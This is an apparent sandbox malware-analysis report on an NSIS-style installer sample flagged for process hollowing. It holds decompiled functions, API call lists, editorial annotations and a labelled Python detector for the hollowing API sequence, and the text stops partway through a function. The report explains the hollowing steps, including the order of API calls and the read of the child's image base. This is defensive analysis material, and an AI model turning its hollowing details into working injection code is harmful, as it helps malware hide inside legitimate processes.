                                                                                    • Instruction ID: fa246daef39c5d1266dc05b53ca8af7bf1dea281c1fa5b10d5a6498bb1fbd0ec
                                                                                    • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                                                                    • Instruction Fuzzy Hash: AAF0F63094050A6BDB14AB64DC0DFFB365CFB08305F1404BAB646E20C2E678E9158FAD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004058CD(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                                                    				signed int _t11;
                                                                                    				int _t14;
                                                                                    				signed int _t16;
                                                                                    				void* _t19;
                                                                                    				CHAR* _t20;
                                                                                    
                                                                                    				_t20 = _a4;
                                                                                    				_t19 = 0x64;
                                                                                    				while(1) {
                                                                                    					_t19 = _t19 - 1;
                                                                                    					_a4 = 0x61736e;
                                                                                    					_t11 = GetTickCount();
                                                                                    					_t16 = 0x1a;
                                                                                    					_a6 = _a6 + _t11 % _t16;
                                                                                    					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                                                                                    					if(_t14 != 0) {
                                                                                    						break;
                                                                                    					}
                                                                                    					if(_t19 != 0) {
                                                                                    						continue;
                                                                                    					}
                                                                                    					 *_t20 =  *_t20 & 0x00000000;
                                                                                    					return _t14;
                                                                                    				}
                                                                                    				return _t20;
                                                                                    			}


                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 004058E0
                                                                                    • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004058FA
                                                                                    Strings
                                                                                    Memory Dump Source
• Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: CountFileNameTempTick
                                                                                    • String ID: "C:\Users\user\Desktop\Nz7NA3F7z7.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                    • API String ID: 1716503409-4291775294
                                                                                    • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                                                    • Instruction ID: 53182d5486abb24f79a58d6e85a6b3ecacc509e50e1b88e8db4ee69f85448782
                                                                                    • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                                                    • Instruction Fuzzy Hash: E8F0A736348258BBD7115E56DC04B9F7F99DFD1760F10C027FA049A280D6B09A54C7A9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 7379337D
                                                                                    • GetThreadContext.KERNELBASE(?,00010007), ref: 737933A0
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 737933C4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.223621335.0000000073793000.00000040.00020000.sdmp, Offset: 73790000, based on PE: true
                                                                                    • Associated: 00000000.00000002.223574209.0000000073790000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.223588828.0000000073791000.00000020.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.223600635.0000000073792000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.223638092.0000000073795000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Process$ContextCreateMemoryReadThread
                                                                                    • String ID:
                                                                                    • API String ID: 2411489757-0
                                                                                    • Opcode ID: 9eb7263f1279a31e60d4b77e2190c73174968e986981d731f7414e9cd505bf28
                                                                                    • Instruction ID: 5d072fcec88909a47d0a5d9b5fbed6a588ddbf25d1a9e7db66067fcc9df9c3b4
                                                                                    • Opcode Fuzzy Hash: 9eb7263f1279a31e60d4b77e2190c73174968e986981d731f7414e9cd505bf28
                                                                                    • Instruction Fuzzy Hash: 77320731E40218EFFB61CBA4ED45BADB7B5AF08700F10459AE619FB2A0D7715A80DF19
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
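                                                                                    The three calls above (CreateProcessW, GetThreadContext, ReadProcessMemory of 4 bytes) are the setup half of process hollowing: spawn a child, pull its thread context, read one pointer out of it. The following is an added example, not part of the Joe Sandbox report and not code from the sample: a Python triage helper that parses API lines in the report's own "• Name.Module(args), ref: addr" format and matches them against the ordered hollowing sequence. The first three constructed sample lines are the ones listed above; the remaining five are constructed to show what the complete sequence looks like and do not come from this report. The stage names, the module tags on the constructed lines and the "hollowing_setup" verdict are assumptions of the example.

```python
import re
from dataclasses import dataclass

# Constructed sample trace in the report's "APIs" line format. Lines 1-3 are the
# calls listed in the report above; lines 4-8 are constructed to complete the
# sequence and are NOT from this report.
SAMPLE_TRACE = """\
• CreateProcessW.KERNELBASE(?,00000000), ref: 7379337D
• GetThreadContext.KERNELBASE(?,00010007), ref: 737933A0
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 737933C4
• NtUnmapViewOfSection.NTDLL(?,?), ref: 737933E0
• VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 73793400
• WriteProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 73793420
• SetThreadContext.KERNELBASE(?,?), ref: 73793440
• ResumeThread.KERNELBASE(?), ref: 73793460
"""

LINE_RE = re.compile(r"^\s*•\s*(\w+)\.(\w+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]+)\s*$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list   # raw argument strings; '?' is an argument the sandbox did not resolve
    ref: int     # call-site address


def parse_trace(text):
    """Parse report-style API lines; lines that do not match the format are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            name, module, args, ref = m.groups()
            calls.append(ApiCall(name, module, args.split(",") if args else [], int(ref, 16)))
    return calls


# Stages of the classic hollowing sequence, in the order they must occur.
# Names within one stage are interchangeable; a stage that is absent is skipped.
STAGES = [
    ("create",  {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"}),
    ("context", {"GetThreadContext", "Wow64GetThreadContext"}),
    ("read",    {"ReadProcessMemory", "NtReadVirtualMemory"}),
    ("unmap",   {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"}),
    ("alloc",   {"VirtualAllocEx", "NtAllocateVirtualMemory"}),
    ("write",   {"WriteProcessMemory", "NtWriteVirtualMemory"}),
    ("set_ctx", {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"}),
    ("resume",  {"ResumeThread", "NtResumeThread"}),
]


def match_stages(calls):
    """Greedy in-order match: each stage is searched for only after the call that
    satisfied the previous stage, so the order of the sequence is enforced."""
    matched = []
    start = 0
    for stage, names in STAGES:
        for i in range(start, len(calls)):
            if calls[i].name in names:
                matched.append((stage, calls[i]))
                start = i + 1
                break
    return matched


def classify(calls):
    """Verdict names are the example's own labels, not Joe Sandbox signature names."""
    stages = {s for s, _ in match_stages(calls)}
    if {"create", "write", "set_ctx", "resume"} <= stages:
        return "process_hollowing"
    if {"create", "context", "read"} <= stages:
        return "hollowing_setup"   # what the three lines in the report show
    return "none"


# x86 CONTEXT_FULL = CONTEXT_i386 | CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS
CONTEXT_FULL_X86 = 0x00010000 | 0x1 | 0x2 | 0x4   # 0x10007, the value printed in the report's GetThreadContext line


def _hex_arg(call, idx):
    try:
        return int(call.args[idx], 16)
    except (IndexError, ValueError):   # '?' or a missing argument
        return None


def reads_pointer_after_full_context(calls):
    """True when the matched GetThreadContext carries CONTEXT_FULL and the matched
    ReadProcessMemory reads exactly 4 bytes (argument index 3 is nSize): a single
    pointer-sized read out of the suspended child, the size needed to lift the
    image base out of the child's PEB."""
    matched = dict(match_stages(calls))
    ctx, rd = matched.get("context"), matched.get("read")
    if ctx is None or rd is None:
        return False
    return _hex_arg(ctx, 1) == CONTEXT_FULL_X86 and _hex_arg(rd, 3) == 4
```

                                                                                    Because the match is order-enforced, the same eight calls in reverse order score as "none"; a trace that stops after the three calls shown in the report scores as "hollowing_setup", which is what the sandbox's "Sample uses process hollowing technique" signature is reacting to here.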

                                                                                    C-Code - Quality: 60%
                                                                                    			// Editor's annotation, an inference and not part of the decompiler output: this handler resolves an
                                                                                    			// export by name and calls it. GetModuleHandleA is tried first so an already-mapped module is reused;
                                                                                    			// LoadLibraryExA runs only when it is not, with flag 8 (LOAD_WITH_ALTERED_SEARCH_PATH). The
                                                                                    			// five-argument call (parent window, 0x400, a block at 0x42f000, a block at 0x40b040, a block at
                                                                                    			// 0x409000) matches the plugin calling convention of an NSIS installer stub, which is consistent with
                                                                                    			// the "nsa" temp-file prefix in the GetTempFileNameA block above. ebx holds 0 throughout, so every
                                                                                    			// comparison against __ebx / _t27 is a NULL check.
                                                                                    			E00401F84(void* __ebx, void* __eflags) {
                                                                                    				struct HINSTANCE__* _t18;
                                                                                    				struct HINSTANCE__* _t26;
                                                                                    				void* _t27;
                                                                                    				struct HINSTANCE__* _t30;
                                                                                    				CHAR* _t32;
                                                                                    				intOrPtr* _t33;
                                                                                    				void* _t34;
                                                                                    
                                                                                    				_t27 = __ebx;
                                                                                    				asm("sbb eax, 0x42ecd8");
                                                                                    				 *(_t34 - 4) = 1;                                   // per-instruction error flag; cleared only once the export resolves
                                                                                    				if(__eflags < 0) {
                                                                                    					_push(0xffffffe7);
                                                                                    					L15:
                                                                                    					E00401423();
                                                                                    					L16:
                                                                                    					 *0x42eca8 =  *0x42eca8 +  *(_t34 - 4);          // fold the error flag into the global error counter
                                                                                    					return 0;
                                                                                    				}
                                                                                    				_t32 = E00402A29(0xfffffff0);                        // module name string, passed to GetModuleHandleA / LoadLibraryExA below
                                                                                    				 *(_t34 + 8) = E00402A29(1);                         // export name string, passed to GetProcAddress below
                                                                                    				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
                                                                                    					L3:
                                                                                    					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed   (8 == LOAD_WITH_ALTERED_SEARCH_PATH)
                                                                                    					_t30 = _t18;
                                                                                    					if(_t30 == _t27) {
                                                                                    						_push(0xfffffff6);                           // load failed: report and leave the error flag set
                                                                                    						goto L15;
                                                                                    					}
                                                                                    					L4:
                                                                                    					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                                                                    					if(_t33 == _t27) {
                                                                                    						E00404EB3(0xfffffff7,  *(_t34 + 8));         // export not found; per the APIs list below the subcall lstrcat's the name into a window/list control
                                                                                    					} else {
                                                                                    						 *(_t34 - 4) = _t27;                         // resolved: clear the error flag
                                                                                    						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
                                                                                    							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x42f000, 0x40b040, 0x409000); // executed   (indirect call into the loaded module)
                                                                                    						} else {
                                                                                    							E00401423( *((intOrPtr*)(_t34 - 0x20)));
                                                                                    							if( *_t33() != 0) {                      // alternate form: no-argument call; a non-zero return re-sets the error flag
                                                                                    								 *(_t34 - 4) = 1;
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004035BA(_t30) != 0) {
                                                                                    						FreeLibrary(_t30);                           // unloaded only when the flag at [ebp-0x1c] is clear and E004035BA agrees
                                                                                    					}
                                                                                    					goto L16;
                                                                                    				}
                                                                                    				_t26 = GetModuleHandleA(_t32); // executed
                                                                                    				_t30 = _t26;
                                                                                    				if(_t30 != __ebx) {
                                                                                    					goto L4;                                         // already mapped: skip LoadLibraryExA
                                                                                    				}
                                                                                    				goto L3;
                                                                                    			}










                                                                                    Instruction addresses for the listing above (one per decompiled line; the column alignment was lost in extraction):
                                                                                    0x00401f84, 0x00401f84, 0x00401f89, 0x00401f90, 0x0040204c, 0x00402197, 0x00402197, 0x004028be,
                                                                                    0x004028c1, 0x004028cd, 0x004028cd, 0x00401f9f, 0x00401fa9, 0x00401fac, 0x00401fbb, 0x00401fbf,
                                                                                    0x00401fc5, 0x00401fc9, 0x00402045, 0x00000000, 0x00402045, 0x00401fcb, 0x00401fd5, 0x00401fd9,
                                                                                    0x0040201d, 0x00401fdb, 0x00401fde, 0x00401fe1, 0x00402011, 0x00401fe3, 0x00401fe6, 0x00401fef,
                                                                                    0x00401ff1, 0x00401ff1, 0x00401fef, 0x00401fe1, 0x00402025, 0x0040203a, 0x0040203a, 0x00000000,
                                                                                    0x00402025, 0x00401faf, 0x00401fb5, 0x00401fb9, 0x00000000, 0x00000000, 0x00000000

                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FAF
                                                                                      • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,0041AF03,74B5EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                                                                      • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041AF03,74B5EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                                                                      • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041AF03,74B5EA30), ref: 00404F0F
                                                                                      • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                                                                      • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
                                                                                      • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
                                                                                      • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F
                                                                                    • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00401FCF
                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                    • String ID:
                                                                                    • API String ID: 2987980305-0
                                                                                    • Opcode ID: b551240a240c733a4c981d6ec1ae38ebb0789affcf7669c1ea097dea2b4299ae
                                                                                    • Instruction ID: 67208966b8f2bf19d9e960a2271e5cf927c7fdd1345161600271a48ac580282b
                                                                                    • Opcode Fuzzy Hash: b551240a240c733a4c981d6ec1ae38ebb0789affcf7669c1ea097dea2b4299ae
                                                                                    • Instruction Fuzzy Hash: 48215B36904215EBDF216FA58E4DAAE7970AF44314F20423BFA01B22E0CBBC4941965E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 86%
                                                                                    			// Editor's annotation, an inference and not part of the decompiler output: this handler creates a
                                                                                    			// directory chain one path component at a time and, in one of its two modes, makes the result the
                                                                                    			// current directory (SetCurrentDirectoryA): the behaviour of an installer's "create directory / set
                                                                                    			// output path" instruction. ebx holds 0 throughout, so comparisons against __ebx / _t26 are NULL or
                                                                                    			// end-of-string checks.
                                                                                    			E004015B3(char __ebx, void* __eflags) {
                                                                                    				void* _t13;
                                                                                    				char _t21;
                                                                                    				void* _t22;
                                                                                    				char _t23;
                                                                                    				signed char _t24;
                                                                                    				char _t26;
                                                                                    				CHAR* _t28;
                                                                                    				char* _t32;
                                                                                    				void* _t33;
                                                                                    
                                                                                    				_t26 = __ebx;
                                                                                    				_t28 = E00402A29(0xfffffff0);                        // the target path string
                                                                                    				_t13 = E0040574E(_t28);                              // skip the root prefix (CharNextA subcalls, see APIs below)
                                                                                    				_t30 = _t13;
                                                                                    				if(_t13 != __ebx) {
                                                                                    					do {
                                                                                    						_t32 = E004056E5(_t30, 0x5c);                // find the next separator (0x5c == '\')
                                                                                    						_t21 =  *_t32;
                                                                                    						 *_t32 = _t26;                               // NUL-terminate at the separator so the prefix can be created
                                                                                    						 *((char*)(_t33 + 0xb)) = _t21;              // keep the separator (0 on the last component)
                                                                                    						if(_t21 != _t26) {
                                                                                    							L5:
                                                                                    							_t22 = E004053F2(_t28);                  // intermediate component (E004053F2 is not resolved in the APIs list)
                                                                                    						} else {
                                                                                    							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
                                                                                    							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E0040540F(_t39) == 0) {
                                                                                    								goto L5;
                                                                                    							} else {
                                                                                    								_t22 = E00405375(_t28); // executed   (final component; subcall wraps CreateDirectoryA, see APIs below)
                                                                                    							}
                                                                                    						}
                                                                                    						if(_t22 != _t26) {                           // non-zero: creation returned an error code
                                                                                    							if(_t22 != 0xb7) {                       // 0xb7 == ERROR_ALREADY_EXISTS (183)
                                                                                    								L9:
                                                                                    								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;   // count the failure
                                                                                    							} else {
                                                                                    								_t24 = GetFileAttributesA(_t28); // executed
                                                                                    								if((_t24 & 0x00000010) == 0) {       // 0x10 == FILE_ATTRIBUTE_DIRECTORY: an existing non-directory counts as a failure
                                                                                    									goto L9;                         // caveat: INVALID_FILE_ATTRIBUTES (0xFFFFFFFF) also has bit 0x10 set, so an unreadable path is not counted
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    						_t23 =  *((intOrPtr*)(_t33 + 0xb));
                                                                                    						 *_t32 = _t23;                               // restore the separator
                                                                                    						_t30 = _t32 + 1;                             // continue after it
                                                                                    					} while (_t23 != _t26);                          // stop at end of string
                                                                                    				}
                                                                                    				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
                                                                                    					_push(0xfffffff5);
                                                                                    					E00401423();
                                                                                    				} else {
                                                                                    					E00401423(0xffffffe6);
                                                                                    					E00405BC7(0x434800, _t28);                       // path handed to the global buffer at 0x434800 (inference)
                                                                                    					if(SetCurrentDirectoryA(_t28) == 0) {            // second mode: make the new chain the current directory
                                                                                    						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                                                    					}
                                                                                    				}
                                                                                    				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t33 - 4));   // fold the failure count into the global error counter
                                                                                    				return 0;
                                                                                    			}












                                                                                    Instruction addresses for the listing above (one per decompiled line; the column alignment was lost in extraction):
                                                                                    0x004015b3, 0x004015ba, 0x004015bd, 0x004015c2, 0x004015c6, 0x004015c8, 0x004015d0, 0x004015d2,
                                                                                    0x004015d4, 0x004015d8, 0x004015db, 0x004015f3, 0x004015f4, 0x004015dd, 0x004015dd, 0x004015e0,
                                                                                    0x00000000, 0x004015eb, 0x004015ec, 0x004015ec, 0x004015e0, 0x004015fb, 0x00401602, 0x0040160f,
                                                                                    0x0040160f, 0x00401604, 0x00401605, 0x0040160d, 0x00000000, 0x00000000, 0x0040160d, 0x00401602,
                                                                                    0x00401612, 0x00401615, 0x00401617, 0x00401618, 0x004015c8, 0x0040161f, 0x0040164a, 0x00402197,
                                                                                    0x00401621, 0x00401623, 0x0040162e, 0x0040163c, 0x00401642, 0x00401642, 0x0040163c, 0x004028c1,
                                                                                    0x004028cd
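                                                                                    The directory walk in E004015B3 is easier to follow as a model than as decompiled control flow. The following is an added example, not part of the Joe Sandbox report and not code from the sample: a Python re-statement of that loop, written to run on any OS, so it splits on os.sep instead of the 0x5c byte and maps POSIX mkdir errors onto the two outcomes the listing distinguishes (ERROR_ALREADY_EXISTS versus anything else). The function names create_dir_chain, set_out_path and demo are the example's own. The existing-directory test uses os.path.isdir rather than the bit-0x10 check, because GetFileAttributesA returning INVALID_FILE_ATTRIBUTES (0xFFFFFFFF) would also satisfy that bit test in the listing.

```python
import os
import shutil
import tempfile

ERROR_ALREADY_EXISTS = 0xB7        # the value the listing compares the create result against
FILE_ATTRIBUTE_DIRECTORY = 0x10    # the bit it tests in the GetFileAttributesA result


def _create_one(path):
    """Create one directory; return 0 on success or a Win32-style error code.
    Assumption of the example: POSIX EEXIST stands in for ERROR_ALREADY_EXISTS,
    any other OSError for a generic failure, so the model runs on any OS."""
    try:
        os.mkdir(path)
        return 0
    except FileExistsError:
        return ERROR_ALREADY_EXISTS
    except OSError as exc:
        return exc.errno or 1


def create_dir_chain(path, sep=os.sep):
    """Walk `path` one separator at a time and create each prefix, the way the
    loop in E004015B3 NUL-terminates the string at each separator, creates the
    prefix and then restores the separator. Returns the failure count the
    listing keeps in [ebp-4]: a creation error counts unless it is
    ERROR_ALREADY_EXISTS and the existing object really is a directory."""
    failures = 0
    parts = path.split(sep)
    for i in range(1, len(parts) + 1):
        prefix = sep.join(parts[:i])
        if not prefix:                 # leading separator: the root, nothing to create
            continue
        err = _create_one(prefix)
        if err == 0:
            continue
        if err == ERROR_ALREADY_EXISTS and os.path.isdir(prefix):
            continue                   # an existing directory is fine
        failures += 1                  # an existing file, or any other error
    return failures


def set_out_path(path):
    """The second mode of the handler: create the chain, then make it the current
    directory (SetCurrentDirectoryA in the listing). Returns (failures, changed)."""
    failures = create_dir_chain(path)
    try:
        os.chdir(path)
        return failures, True
    except OSError:
        return failures + 1, False


def demo():
    """Constructed scenario in a temporary directory: a fresh chain, the same chain
    again, and a chain blocked by a plain file where a directory is expected."""
    base = tempfile.mkdtemp()
    cwd = os.getcwd()
    try:
        target = os.path.join(base, "a", "b", "c")
        fresh = create_dir_chain(target)          # 0: every component created
        again = create_dir_chain(target)          # 0: ERROR_ALREADY_EXISTS on directories is tolerated
        blocker = os.path.join(base, "x")
        open(blocker, "w").close()                # a file, not a directory
        blocked = create_dir_chain(os.path.join(blocker, "y"))   # 2: 'x' exists but is a file, then 'x/y' fails
        out_failures, changed = set_out_path(target)
        return fresh, again, blocked, out_failures, changed
    finally:
        os.chdir(cwd)
        shutil.rmtree(base)
```

                                                                                    The blocked case is the one the 0xb7 branch exists for: "already exists" is only acceptable when the thing in the way is a directory, otherwise the failure is counted and ends up in the global error counter at 0x42eca8.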

                                                                                    APIs
                                                                                      • Part of subcall function 0040574E: CharNextA.USER32(00405500,?,0042B4A8,00000000,004057B2,0042B4A8,0042B4A8,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040575C
                                                                                      • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405761
                                                                                      • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405770
                                                                                    • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                                      • Part of subcall function 00405375: CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 004053B8
                                                                                    • SetCurrentDirectoryA.KERNEL32(00000000,00434800,00000000,00000000,000000F0), ref: 00401634
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                    • String ID:
                                                                                    • API String ID: 1892508949-0
                                                                                    • Opcode ID: 61034fe80c9a9cb978dfe94cf849e2fb3a16e6b52be6386198d2ddf70ce6f83f
                                                                                    • Instruction ID: f91ea4ffc010c5324243c64a5f93d27bb3485e0f7fec8187872c5a269388ad6c
                                                                                    • Opcode Fuzzy Hash: 61034fe80c9a9cb978dfe94cf849e2fb3a16e6b52be6386198d2ddf70ce6f83f
                                                                                    • Instruction Fuzzy Hash: F011EB35504141ABDF317FA55D419BF67B4E992324728063FF592722D2C63C4942AA2F
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 69%
			// Code-segment interpreter loop: starting at entry index _a4, executes one table entry per
			// iteration, follows jumps, and advances a progress bar. The entry table is pointed to by the
			// global at 0x42ec50; each entry is 0x1c bytes and its first DWORD is the entry type.
			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;   // frame pointer; the decompiler did not recover the second argument (progress-bar HWND) read through it below

				_t17 = _a4;                                  // current entry index
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42ec50;          // &entries[_t17]
					if( *_t6 == 1) {                         // entry type 1 ends this code segment
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed           // execute the entry; returns the next position (1-based) or 0 to fall through
					if(_t8 == 0x7fffffff) {                  // execution-error sentinel, propagated unchanged to the caller
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);                   // resolve the returned target to an entry index
					if(_t10 != 0) {
						_t11 = _t10 - 1;                     // targets are 1-based
						_t16 = _t17;
						_t17 = _t11;                         // jump
						_t12 = _t11 - _t16;                  // progress delta = distance jumped (may be negative)
					} else {
						_t12 = _t10 + 1;                     // fall through to the next entry: delta 1
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {   // caller supplied a progress-bar window handle
						 *0x42e40c =  *0x42e40c + _t12;      // global progress position
						// PBM_SETPOS (0x402) with the position rescaled to the 0..30000 (0x7530) range
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42e40c, 0x7530,  *0x42e3f4), 0);
					}
				}
				return 0;
			}

Instruction addresses for the listing above (one per decompiled line; 0x00000000 marks a line with no instruction): 0x0040138a, 0x004013fa, 0x0040139b, 0x004013a0, 0x00000000, 0x00000000, 0x004013a2, 0x004013a3, 0x004013ad, 0x00000000, 0x00401404, 0x004013b0, 0x004013b7, 0x004013bd, 0x004013be, 0x004013c0, 0x004013c2, 0x004013b9, 0x004013b9, 0x004013ba, 0x004013ba, 0x004013c9, 0x004013cb, 0x004013f4, 0x004013f4, 0x004013c9, 0x00000000

                                                                                    APIs
                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                    • SendMessageA.USER32(00000020,00000402,00000000), ref: 004013F4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: 1418929eafbb73b8fb58d843c81c3155069c7e16b288247307ca07652a38143c
                                                                                    • Instruction ID: 74927b77398f0d82d02f0f32bcc48ccf03ca760f88dcf9e2e40121dab22ba05a
                                                                                    • Opcode Fuzzy Hash: 1418929eafbb73b8fb58d843c81c3155069c7e16b288247307ca07652a38143c
                                                                                    • Instruction Fuzzy Hash: 4901F431B242209BE7195B399C09B6A3698E710328F10863BF851F72F1D678DC039B4D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
			// Run-time import resolver: _a4 indexes an 8-byte table at 0x409208 whose entries are
			// { char* dll_name, char* proc_name }. The DLL is looked up by name and, if not already
			// mapped, loaded from the system directory (subcall E00405EE9: GetSystemDirectoryA +
			// wsprintfA + LoadLibraryExA with flag 8 = LOAD_WITH_ALTERED_SEARCH_PATH), then the
			// export is resolved with GetProcAddress. None of these APIs appear in the import directory.
			E00405F57(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;
				CHAR* _t8;                                   // DLL name; declaration was missing from the decompiler output

				_t10 = _a4 << 3;                             // entry offset = index * 8
				_t8 =  *(_t10 + 0x409208);                   // entry.dll_name
				_t5 = GetModuleHandleA(_t8);                 // already loaded in this process?
				if(_t5 != 0) {
					L2:
